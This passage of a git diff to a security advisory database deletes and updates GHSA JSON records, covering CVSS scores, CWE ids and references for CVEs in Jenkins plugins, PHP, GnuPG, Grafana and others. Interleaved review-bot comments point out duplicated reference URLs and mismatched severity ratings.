administrator password via the pseudo, pwd, and uid parameters in an admin_info_user_verif action.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ diff --git a/advisories/unreviewed/2022/05/GHSA-hrr3-7r5v-vxx5/GHSA-hrr3-7r5v-vxx5.json b/advisories/unreviewed/2022/05/GHSA-hrr3-7r5v-vxx5/GHSA-hrr3-7r5v-vxx5.json deleted file mode 100644 index 7529cd60769d6..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-hrr3-7r5v-vxx5/GHSA-hrr3-7r5v-vxx5.json +++ /dev/null 
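Review bot: The fifteen `cvs.httpd.apache.org` thread links added in the large hunk of GHSA-hfr6-pxvf-frf7 duplicate entries already present immediately below each one, the only difference being `%40` in place of `@`; the array now repeats every reference. Keep a single spelling per thread (for example retain `"url": "https://lists.apache.org/thread.html/8d63cb8e9100f28a99429b4328e4e7cebce861d5772ac9863ba2ae6f@%3Ccvs.httpd.apache.org%3E"` and remove its `%40` twin) so downstream tooling that matches URLs by exact string does not surface doubled links. The CWE-776 addition in the last hunk matches the nested-entity-expansion behaviour described in `details` and the A:H-only CVSS vector added in the first hunk is consistent with a memory-exhaustion DoS, so those two changes look right as written.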
@@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-hrr3-7r5v-vxx5", - "modified": "2022-05-14T02:56:40Z", - "published": "2022-05-14T02:56:40Z", - "aliases": [ - "CVE-2018-1999035" - ], - "details": "A man in the middle vulnerability exists in Jenkins Inedo BuildMaster Plugin 1.3 and earlier in BuildMasterConfiguration.java, BuildMasterConfig.java, BuildMasterApi.java that allows attackers to impersonate any service that Jenkins connects to.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1999035" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-07-30/#SECURITY-935" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-295" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-08-01T13:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-hw83-jpxr-g225/GHSA-hw83-jpxr-g225.json b/advisories/unreviewed/2022/05/GHSA-hw83-jpxr-g225/GHSA-hw83-jpxr-g225.json deleted file mode 100644 index 8ab4c1e748b88..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-hw83-jpxr-g225/GHSA-hw83-jpxr-g225.json +++ /dev/null 
@@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-hw83-jpxr-g225", - "modified": "2022-05-13T01:31:34Z", - "published": "2022-05-13T01:31:34Z", - "aliases": [ - "CVE-2019-1003022" - ], - "details": "A denial of service vulnerability exists in Jenkins Monitoring Plugin 1.74.0 and earlier in PluginImpl.java that allows attackers to kill threads running on the Jenkins master.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003022" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-01-28/#SECURITY-1153" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-02-06T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-j2h6-j34w-g5vp/GHSA-j2h6-j34w-g5vp.json b/advisories/unreviewed/2022/05/GHSA-j2h6-j34w-g5vp/GHSA-j2h6-j34w-g5vp.json deleted file mode 100644 index 69477e467407f..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-j2h6-j34w-g5vp/GHSA-j2h6-j34w-g5vp.json +++ /dev/null 
@@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-j2h6-j34w-g5vp", - "modified": "2022-05-14T03:45:49Z", - "published": "2022-05-14T03:45:49Z", - "aliases": [ - "CVE-2018-1000013" - ], - "details": "Jenkins Release Plugin 2.9 and earlier did not require form submissions to be submitted via POST, resulting in a CSRF vulnerability allowing attackers to trigger release builds.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000013" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-01-22/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/102834" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-01-23T14:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-j2rp-vprg-5m9q/GHSA-j2rp-vprg-5m9q.json b/advisories/unreviewed/2022/05/GHSA-j2rp-vprg-5m9q/GHSA-j2rp-vprg-5m9q.json index 9cf4c8f0fda31..bd1fb59f259f0 100644 --- a/advisories/unreviewed/2022/05/GHSA-j2rp-vprg-5m9q/GHSA-j2rp-vprg-5m9q.json +++ b/advisories/unreviewed/2022/05/GHSA-j2rp-vprg-5m9q/GHSA-j2rp-vprg-5m9q.json @@ -44,7 +44,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-285" + "CWE-285", + "CWE-918" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-j66q-qmrc-89rx/GHSA-j66q-qmrc-89rx.json b/advisories/unreviewed/2022/05/GHSA-j66q-qmrc-89rx/GHSA-j66q-qmrc-89rx.json deleted file mode 100644 index 3ba367e45c4c9..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-j66q-qmrc-89rx/GHSA-j66q-qmrc-89rx.json +++ /dev/null 
@@ -1,55 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-j66q-qmrc-89rx", - "modified": "2022-05-24T17:36:44Z", - "published": "2022-05-24T17:36:44Z", - "aliases": [ - "CVE-2020-22083" - ], - "details": "jsonpickle through 1.4.1 allows remote code execution during deserialization of a malicious payload through the decode() function.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-22083" - }, - { - "type": "WEB", - "url": "https://github.com/jsonpickle/jsonpickle/issues/332" - }, - { - "type": "WEB", - "url": "https://github.com/jsonpickle/jsonpickle/issues/332#issuecomment-747807494" - }, - { - "type": "WEB", - "url": "https://access.redhat.com/security/cve/CVE-2020-22083" - }, - { - "type": "WEB", - "url": "https://gist.github.com/j0lt-github/bb543e77a1a10c33cb56cf23d0837874" - }, - { - "type": "WEB", - "url": "https://github.com/j0lt-github/python-deserialization-attack-payload-generator" - }, - { - "type": "WEB", - "url": "https://versprite.com/blog/application-security/into-the-jar-jsonpickle-exploitation/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-502" - ], - "severity": "CRITICAL", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-12-17T16:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-jcmg-9rw5-9rm2/GHSA-jcmg-9rw5-9rm2.json b/advisories/unreviewed/2022/05/GHSA-jcmg-9rw5-9rm2/GHSA-jcmg-9rw5-9rm2.json deleted file mode 100644 index 8d2cfcbfb5263..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-jcmg-9rw5-9rm2/GHSA-jcmg-9rw5-9rm2.json +++ /dev/null 
@@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-jcmg-9rw5-9rm2", - "modified": "2022-05-13T01:30:26Z", - "published": "2022-05-13T01:30:26Z", - "aliases": [ - "CVE-2018-1000426" - ], - "details": "A cross-site scripting vulnerability exists in Jenkins Git Changelog Plugin 2.6 and earlier in GitChangelogSummaryDecorator/summary.jelly, GitChangelogLeftsideBuildDecorator/badge.jelly, GitLogJiraFilterPostPublisher/config.jelly, GitLogBasicChangelogPostPublisher/config.jelly that allows attackers able to control the Git history parsed by the plugin to have Jenkins render arbitrary HTML on some pages.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000426" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-09-25/#SECURITY-1122" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/106532" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-01-09T23:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-jcp3-xfrr-gf86/GHSA-jcp3-xfrr-gf86.json b/advisories/unreviewed/2022/05/GHSA-jcp3-xfrr-gf86/GHSA-jcp3-xfrr-gf86.json index 011423a75cb39..8e5651265ca0d 100644 --- a/advisories/unreviewed/2022/05/GHSA-jcp3-xfrr-gf86/GHSA-jcp3-xfrr-gf86.json +++ b/advisories/unreviewed/2022/05/GHSA-jcp3-xfrr-gf86/GHSA-jcp3-xfrr-gf86.json 
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-jcp3-xfrr-gf86",
- "modified": "2022-05-02T03:29:05Z",
+ "modified": "2024-02-02T18:30:21Z",
 "published": "2022-05-02T03:29:05Z",
 "aliases": [
 "CVE-2009-1837"
 ],
 "details": "Race condition in the NPObjWrapper_NewResolve function in modules/plugin/base/src/nsJSNPRuntime.cpp in xul.dll in Mozilla Firefox 3 before 3.0.11 might allow remote attackers to execute arbitrary code via a page transition during Java applet loading, related to a use-after-free vulnerability for memory associated with a destroyed Java object.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
diff --git a/advisories/unreviewed/2022/05/GHSA-jfj9-7j5w-6xgx/GHSA-jfj9-7j5w-6xgx.json b/advisories/unreviewed/2022/05/GHSA-jfj9-7j5w-6xgx/GHSA-jfj9-7j5w-6xgx.json
deleted file mode 100644
index ae92a7bbbe3e3..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-jfj9-7j5w-6xgx/GHSA-jfj9-7j5w-6xgx.json
+++ /dev/null
@@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-jfj9-7j5w-6xgx", - "modified": "2022-05-14T03:46:09Z", - "published": "2022-05-14T03:46:09Z", - "aliases": [ - "CVE-2018-1000009" - ], - "details": "Jenkins Checkstyle Plugin 3.49 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, or denial-of-service attacks.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000009" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-01-22/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-611" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-01-23T14:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-jhxw-fqxp-j75j/GHSA-jhxw-fqxp-j75j.json b/advisories/unreviewed/2022/05/GHSA-jhxw-fqxp-j75j/GHSA-jhxw-fqxp-j75j.json index 8f81dcf7db191..67e640ac1e047 100644 --- a/advisories/unreviewed/2022/05/GHSA-jhxw-fqxp-j75j/GHSA-jhxw-fqxp-j75j.json +++ b/advisories/unreviewed/2022/05/GHSA-jhxw-fqxp-j75j/GHSA-jhxw-fqxp-j75j.json 
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-jhxw-fqxp-j75j",
- "modified": "2022-05-01T17:52:04Z",
+ "modified": "2024-02-02T15:30:27Z",
 "published": "2022-05-01T17:52:04Z",
 "aliases": [
 "CVE-2007-1285"
 ],
 "details": "The Zend Engine in PHP 4.x before 4.4.7, and 5.x before 5.2.2, allows remote attackers to cause a denial of service (stack exhaustion and PHP crash) via deeply nested arrays, which trigger deep recursion in the variable destruction routines.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
 ],
 "affected": [
 
@@ -173,7 +176,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-119"
+ "CWE-119",
+ "CWE-674"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-jjg3-cx5h-88wm/GHSA-jjg3-cx5h-88wm.json b/advisories/unreviewed/2022/05/GHSA-jjg3-cx5h-88wm/GHSA-jjg3-cx5h-88wm.json
index 93b845de14a5c..97352ab56f9ef 100644
--- a/advisories/unreviewed/2022/05/GHSA-jjg3-cx5h-88wm/GHSA-jjg3-cx5h-88wm.json
+++ b/advisories/unreviewed/2022/05/GHSA-jjg3-cx5h-88wm/GHSA-jjg3-cx5h-88wm.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-jjg3-cx5h-88wm",
- "modified": "2022-05-17T05:45:28Z",
+ "modified": "2024-02-02T18:30:22Z",
 "published": "2022-05-17T05:45:28Z",
 "aliases": [
 "CVE-2010-2547"
 ],
 "details": "Use-after-free vulnerability in kbx/keybox-blob.c in GPGSM in GnuPG 2.x through 2.0.16 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a certificate with a large number of Subject Alternate Names, which is not properly handled in a realloc operation when importing the certificate or verifying its signature.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -105,7 +108,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-416"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
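Review bot: The CVSS 3.1 vector added to `severity` in GHSA-jhxw-fqxp-j75j (`AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`) evaluates to a 7.5 base score, which falls in the HIGH band under the usual 7.0–8.9 mapping, yet the second hunk of the same file leaves `"severity": "MODERATE"` in `database_specific`, so the two severity fields in one document now disagree. The same mismatch is visible in GHSA-jjg3-cx5h-88wm (8.1 vs `MODERATE`, also on this line), GHSA-jrv6-p293-phjx (7.5 vs `MODERATE`), GHSA-m65m-xrgm-j736 (9.8 vs `HIGH`) and GHSA-m9m5-q9x5-6877 (9.8 vs `HIGH`) further down. If `database_specific.severity` is meant to be derived from the vector, these should be re-rated in the same commit (here `"severity": "HIGH"`); if it intentionally keeps an earlier rating, that policy deserves a sentence in the commit message so consumers know which field to trust.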
diff --git a/advisories/unreviewed/2022/05/GHSA-jp4r-pf5r-4wg8/GHSA-jp4r-pf5r-4wg8.json b/advisories/unreviewed/2022/05/GHSA-jp4r-pf5r-4wg8/GHSA-jp4r-pf5r-4wg8.json deleted file mode 100644 index e4b531c2217a5..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-jp4r-pf5r-4wg8/GHSA-jp4r-pf5r-4wg8.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-jp4r-pf5r-4wg8", - "modified": "2022-05-13T01:25:43Z", - "published": "2022-05-13T01:25:43Z", - "aliases": [ - "CVE-2019-1003080" - ], - "details": "A cross-site request forgery vulnerability in Jenkins OpenShift Deployer Plugin in the DeployApplication.DeployApplicationDescriptor#doCheckLogin form validation method allows attackers to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003080" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-981" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-jr38-ch73-ccgx/GHSA-jr38-ch73-ccgx.json b/advisories/unreviewed/2022/05/GHSA-jr38-ch73-ccgx/GHSA-jr38-ch73-ccgx.json index dfe3e4efd8a12..ed5dfa2906012 100644 --- a/advisories/unreviewed/2022/05/GHSA-jr38-ch73-ccgx/GHSA-jr38-ch73-ccgx.json +++ b/advisories/unreviewed/2022/05/GHSA-jr38-ch73-ccgx/GHSA-jr38-ch73-ccgx.json 
@@ -33,10 +33,18 @@
 "type": "WEB",
 "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00003.html"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZXCI33HXH6YSOGC2LPE2REQLMIDH6US4/"
+ },
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZXCI33HXH6YSOGC2LPE2REQLMIDH6US4/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-32"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5490"
diff --git a/advisories/unreviewed/2022/05/GHSA-jr79-65xr-q7cx/GHSA-jr79-65xr-q7cx.json b/advisories/unreviewed/2022/05/GHSA-jr79-65xr-q7cx/GHSA-jr79-65xr-q7cx.json
deleted file mode 100644
index 867f2470af108..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-jr79-65xr-q7cx/GHSA-jr79-65xr-q7cx.json
+++ /dev/null
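Review bot: The first reference added in this hunk is the same Fedora announcement URL as the existing entry directly below it, differing only in `%40` versus a literal `@` in the list address, so the file now carries two entries for one resource. Consumers that dedupe references by exact string will show it twice, and a later sync may flip the encoding again and add a third copy. Prefer one canonical form per URL (drop the added `%40` entry or replace the existing one) and normalise percent-encoding in the importer; the same `%40`/`@` doubling is visible earlier in this diff for the lists.apache.org references. The `https://security.gentoo.org/glsa/202401-32` addition raises no issue.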
@@ -1,54 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-jr79-65xr-q7cx", - "modified": "2022-05-17T00:26:03Z", - "published": "2022-05-17T00:26:03Z", - "aliases": [ - "CVE-2010-3659" - ], - "details": "Multiple cross-site scripting (XSS) vulnerabilities in TYPO3 CMS 4.1.x before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4, and 4.4.x before 4.4.1 allow remote authenticated backend users to inject arbitrary web script or HTML via unspecified parameters to the extension manager, or unspecified parameters to unknown backend forms.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3659" - }, - { - "type": "WEB", - "url": "https://security-tracker.debian.org/tracker/CVE-2010-3659/" - }, - { - "type": "WEB", - "url": "https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-sa-2010-012/" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2010/09/28/8" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2014/02/12/8" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/42029" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2017-10-20T18:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-jrv6-p293-phjx/GHSA-jrv6-p293-phjx.json b/advisories/unreviewed/2022/05/GHSA-jrv6-p293-phjx/GHSA-jrv6-p293-phjx.json index 19fef064292f7..b57c1b1f443c6 100644 --- a/advisories/unreviewed/2022/05/GHSA-jrv6-p293-phjx/GHSA-jrv6-p293-phjx.json +++ b/advisories/unreviewed/2022/05/GHSA-jrv6-p293-phjx/GHSA-jrv6-p293-phjx.json 
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-jrv6-p293-phjx",
- "modified": "2022-05-01T01:57:13Z",
+ "modified": "2024-02-08T21:30:31Z",
 "published": "2022-05-01T01:57:13Z",
 "aliases": [
 "CVE-2005-1306"
 ],
 "details": "The Adobe Reader control in Adobe Reader and Acrobat 7.0 and 7.0.1 allows remote attackers to determine the existence of files via Javascript containing XML script, aka the \"XML External Entity vulnerability.\"",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
 ],
 "affected": [
 
@@ -29,7 +32,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-611"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-jvw4-xfqp-q5qh/GHSA-jvw4-xfqp-q5qh.json b/advisories/unreviewed/2022/05/GHSA-jvw4-xfqp-q5qh/GHSA-jvw4-xfqp-q5qh.json
index 83cd8828d8ff3..c58a05f647006 100644
--- a/advisories/unreviewed/2022/05/GHSA-jvw4-xfqp-q5qh/GHSA-jvw4-xfqp-q5qh.json
+++ b/advisories/unreviewed/2022/05/GHSA-jvw4-xfqp-q5qh/GHSA-jvw4-xfqp-q5qh.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-jvw4-xfqp-q5qh",
- "modified": "2022-05-01T23:58:42Z",
+ "modified": "2024-02-08T03:32:44Z",
 "published": "2022-05-01T23:58:42Z",
 "aliases": [
 "CVE-2008-3282"
 ],
 "details": "Integer overflow in the rtl_allocateMemory function in sal/rtl/source/alloc_global.c in the memory allocator in OpenOffice.org (OOo) 2.4.1, on 64-bit platforms, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted document, related to a \"numeric truncation error,\" a different vulnerability than CVE-2008-2152.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -77,7 +80,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-681"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-jxfp-4rvq-9h9m/GHSA-jxfp-4rvq-9h9m.json b/advisories/unreviewed/2022/05/GHSA-jxfp-4rvq-9h9m/GHSA-jxfp-4rvq-9h9m.json deleted file mode 100644 index 3b26930b69944..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-jxfp-4rvq-9h9m/GHSA-jxfp-4rvq-9h9m.json +++ /dev/null @@ -1,58 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-jxfp-4rvq-9h9m", - "modified": "2022-11-25T21:30:26Z", - "published": "2022-05-24T17:34:40Z", - "aliases": [ - "CVE-2020-28975" - ], - "details": "svm_predict_values in svm.cpp in Libsvm v324, as used in scikit-learn 0.23.2 and other products, allows attackers to cause a denial of service (segmentation fault) via a crafted model SVM (introduced via pickle, json, or any other model permanence standard) with a large value in the _n_support array.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28975" - }, - { - "type": "WEB", - "url": "https://github.com/scikit-learn/scikit-learn/issues/18891" - }, - { - "type": "WEB", - "url": "https://github.com/scikit-learn/scikit-learn/commit/1bf13d567d3cd74854aa8343fd25b61dd768bb85" - }, - { - "type": "WEB", - "url": "https://github.com/cjlin1/libsvm/blob/9a3a9708926dec87d382c43b203f2ca19c2d56a0/svm.cpp#L2501" - }, - { - "type": "WEB", - "url": "https://security.gentoo.org/glsa/202301-03" - }, - { - "type": "WEB", - "url": "http://packetstormsecurity.com/files/160281/SciKit-Learn-0.23.2-Denial-Of-Service.html" - }, - { - "type": "WEB", - "url": "http://seclists.org/fulldisclosure/2020/Nov/44" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-11-21T21:15:00Z" - } -} \ No newline at end of file 
diff --git a/advisories/unreviewed/2022/05/GHSA-m25m-5778-fm22/GHSA-m25m-5778-fm22.json b/advisories/unreviewed/2022/05/GHSA-m25m-5778-fm22/GHSA-m25m-5778-fm22.json deleted file mode 100644 index 17bd0947e9a24..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-m25m-5778-fm22/GHSA-m25m-5778-fm22.json +++ /dev/null 
@@ -1,67 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-m25m-5778-fm22", - "modified": "2022-05-24T17:16:52Z", - "published": "2022-05-24T17:16:52Z", - "aliases": [ - "CVE-2020-12459" - ], - "details": "In certain Red Hat packages for Grafana 6.x through 6.3.6, the configuration files /etc/grafana/grafana.ini and /etc/grafana/ldap.toml (which contain a secret_key and a bind_password) are world readable.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12459" - }, - { - "type": "WEB", - "url": "https://github.com/grafana/grafana/issues/8283" - }, - { - "type": "WEB", - "url": "https://access.redhat.com/security/cve/CVE-2020-12459" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1827765" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1829724" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CTQCKJZZYXMCSHJFZZ3YXEO5NUBANGZS/" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WEBCIEVSYIDDCA7FTRS2IFUOYLIQU34A/" - }, - { - "type": "WEB", - "url": "https://security.netapp.com/advisory/ntap-20200518-0004/" - }, - { - "type": "WEB", - "url": "https://src.fedoraproject.org/rpms/grafana/c/fab93d67363eb0a9678d9faf160cc88237f26277" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-200", - "CWE-732" - ], - "severity": "LOW", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-04-29T16:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-m2hm-f4mr-r66g/GHSA-m2hm-f4mr-r66g.json b/advisories/unreviewed/2022/05/GHSA-m2hm-f4mr-r66g/GHSA-m2hm-f4mr-r66g.json index a1660651b38d0..713cdd12aa43f 100644 
--- a/advisories/unreviewed/2022/05/GHSA-m2hm-f4mr-r66g/GHSA-m2hm-f4mr-r66g.json +++ b/advisories/unreviewed/2022/05/GHSA-m2hm-f4mr-r66g/GHSA-m2hm-f4mr-r66g.json @@ -33,7 +33,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-770" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-m46p-rp8x-x8c4/GHSA-m46p-rp8x-x8c4.json b/advisories/unreviewed/2022/05/GHSA-m46p-rp8x-x8c4/GHSA-m46p-rp8x-x8c4.json deleted file mode 100644 index 9928c8f655fee..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-m46p-rp8x-x8c4/GHSA-m46p-rp8x-x8c4.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-m46p-rp8x-x8c4", - "modified": "2022-05-13T01:25:16Z", - "published": "2022-05-13T01:25:16Z", - "aliases": [ - "CVE-2019-1003081" - ], - "details": "A missing permission check in Jenkins OpenShift Deployer Plugin in the DeployApplication.DeployApplicationDescriptor#doCheckLogin form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003081" - }, - { - "type": "WEB", - "url": 